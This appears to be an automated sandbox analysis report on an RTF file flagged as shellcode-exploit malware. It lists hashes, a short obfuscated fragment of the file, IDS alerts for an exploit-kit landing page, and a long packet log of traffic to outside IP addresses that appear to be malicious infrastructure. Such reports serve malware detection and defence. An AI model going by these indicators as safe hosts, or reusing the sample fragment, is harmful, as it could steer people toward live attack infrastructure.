SHA-256:	4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
SHA-512:	542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	3.186688494100792
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf
File size:	74'864 bytes
MD5:	f97c50feb93e72f7d26909c1180de9f2
SHA1:	809c718c1685b18ace672b7aae0a3b9be1b9627b
SHA256:	0c724088f1514a0d94864926816ab77c638b1204f4f5651a04e6d26dfee04ea7
SHA512:	3a02c2538959001e1dd45667b362df7c967bee68e939919b58bd593cde9cc653201c2bb0a64d408d8c7e5d5c80f849b8af6303998013ffcd4562bc1df49e7796
SSDEEP:	1536:pUlKpWpupfL9+HlHkDOEAgG+Re7LGhzgTExsjaY9qyrcseX1VgLY:zWpupfLQlHHngxRoKhzgTq4rBeX1VgLY
TLSH:	9E73996EE74F0924DF55967B434A4B4A05FCB33DB38140B139AC97343BAD82E4A6287C
File Content Preview:	{\rtf1...........{\\fttruetype462389762 \=}.{\8166233845;8~.@+],)9/[=91+9;>:2-.??%8\|^0='~6??.#?>-&]+&-\|(''%&;325;?&/+?'^7@..!\|]2?\|-)([.%?_?\|0,3_(7(_\|?6&.~@13:.#[&?`&2&(#^8;.8:'68?$?]&-0`8.119[?%1.,6.3%)]_.(]:@[!:9/8>#2>;%0%.-7/&/,9.$2@$[[:?%6@;0^^(,

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00001D3Dh								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/24/24-10:24:19.607000	TCP	2020423	ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1	80	49165	192.210.214.26	192.168.2.22
04/24/24-10:24:19.607000	TCP	2020424	ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1	80	49165	192.210.214.26	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 10:24:03.843080044 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.035979986 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.036134958 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.036433935 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.238842010 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.238867044 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.238976002 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.239001989 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.239062071 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.239120007 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.239214897 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.239236116 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.239269972 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.239274979 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.239284039 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.239312887 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.239469051 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.240982056 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.241070032 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.241117954 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.241164923 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.243110895 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.431372881 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.431400061 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.431539059 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.431555033 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.432322025 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.432394981 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.433154106 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.433216095 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.433228970 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.433257103 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.433286905 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.433310986 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.433357000 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.433374882 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.433422089 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.433439970 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.433485031 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.433532953 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.433830023 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.433877945 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.433897018 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.433933020 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.433949947 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.434541941 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.434593916 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.435230970 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.435247898 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.435281992 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.435323954 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.435364008 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.435395002 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.435434103 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.435476065 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.621773005 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.621798038 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.621810913 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.621835947 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.621881962 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.623289108 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.624294996 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.624356985 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.624363899 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.624396086 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.624445915 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.624484062 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.624524117 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.624557018 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.624677896 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.624716997 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.624725103 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.624747992 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.624806881 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.624842882 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.624898911 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.624932051 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625092983 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625128984 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625164032 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625196934 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625272036 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625305891 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625328064 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625365019 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625403881 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625437975 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625471115 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625493050 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625504971 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625524998 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625571966 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625605106 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625642061 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625674009 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625691891 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625724077 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625757933 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625792027 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625794888 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625827074 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625880957 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625914097 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.625947952 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.625979900 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.626050949 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.626082897 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.626116991 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.626149893 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.626271963 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.626302958 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.626346111 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.626378059 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.626430035 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.626466036 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.626477003 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.626509905 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.626583099 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.626621008 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.626694918 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.626739025 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.626754999 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.626789093 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.626821995 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.626857996 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.626938105 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.626972914 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.627005100 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.627037048 CEST	80	49161	192.210.214.26	192.168.2.22
Apr 24, 2024 10:24:04.627046108 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:04.627069950 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:05.841710091 CEST	49161	80	192.168.2.22	192.210.214.26
Apr 24, 2024 10:24:06.157620907 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:06.157676935 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:06.157752991 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:06.198748112 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:06.198776960 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:06.535033941 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:06.535110950 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:06.551120043 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:06.551153898 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:06.552412033 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:06.552478075 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:06.788275003 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:06.832143068 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.287415028 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.287482977 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.287530899 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.287530899 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.287589073 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.287642956 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.287657976 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.287715912 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.287728071 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.287779093 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.287955046 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.288002014 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.288026094 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.288069963 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.288081884 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.288136959 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.288187981 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.288237095 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.288249016 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.288296938 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.288326025 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.288367033 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.288377047 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.288414001 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.288424015 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.288459063 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.288474083 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.288486004 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:07.288510084 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.288531065 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.544285059 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.545161963 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 24, 2024 10:24:07.545181036 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 24, 2024 10:24:10.092562914 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.092612982 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.092668056 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.097332954 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.097352982 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.432987928 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.433147907 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.450182915 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.450213909 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.450448036 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.558913946 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.600119114 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.797979116 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.798058987 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.798119068 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.798119068 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.798146009 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.798188925 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.798384905 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.798512936 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.798562050 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.798571110 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.798629045 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.798674107 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.798679113 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.798719883 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.798768044 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.798777103 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.799084902 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.799134970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.799144030 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.799736023 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.799746990 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.800020933 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.800164938 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.800246954 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.800252914 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.800302029 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.800344944 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.800349951 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.800461054 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.800827026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.801017046 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.801068068 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.801074982 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.802277088 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.802328110 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.802330017 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.802345991 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.802391052 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.802400112 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.802752972 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.802793026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.802799940 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.802807093 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.802862883 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.802869081 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.803545952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.803591013 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.803599119 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.803674936 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.803716898 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.803721905 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.804487944 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.804537058 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.804541111 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.804553986 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.804590940 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.805313110 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.805474997 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.805526018 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.805526972 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.805538893 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.805572033 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.806194067 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.806672096 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.806726933 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.806735039 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.964389086 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.964462996 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.964488983 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.964612961 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.964621067 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.964664936 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.964674950 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.964905024 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.964966059 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.964972019 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.967422962 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.967472076 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.967485905 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.969414949 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.969465017 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.969475985 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.969680071 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.969733000 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.969739914 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.969997883 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.970036983 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.970045090 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.970519066 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.970566034 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.970571995 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.971365929 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.971416950 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.971425056 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.975785971 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.975856066 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.975868940 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.975914001 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.975958109 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.975965023 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.976202965 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.976259947 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.976268053 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.976522923 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.976569891 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.976577997 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.976943970 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.976989031 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.976995945 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.977099895 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.977157116 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.977164984 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.977612019 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 24, 2024 10:24:10.977667093 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 24, 2024 10:24:10.977679968 CEST	443	49163	172.67.215.45	192.168.2.22
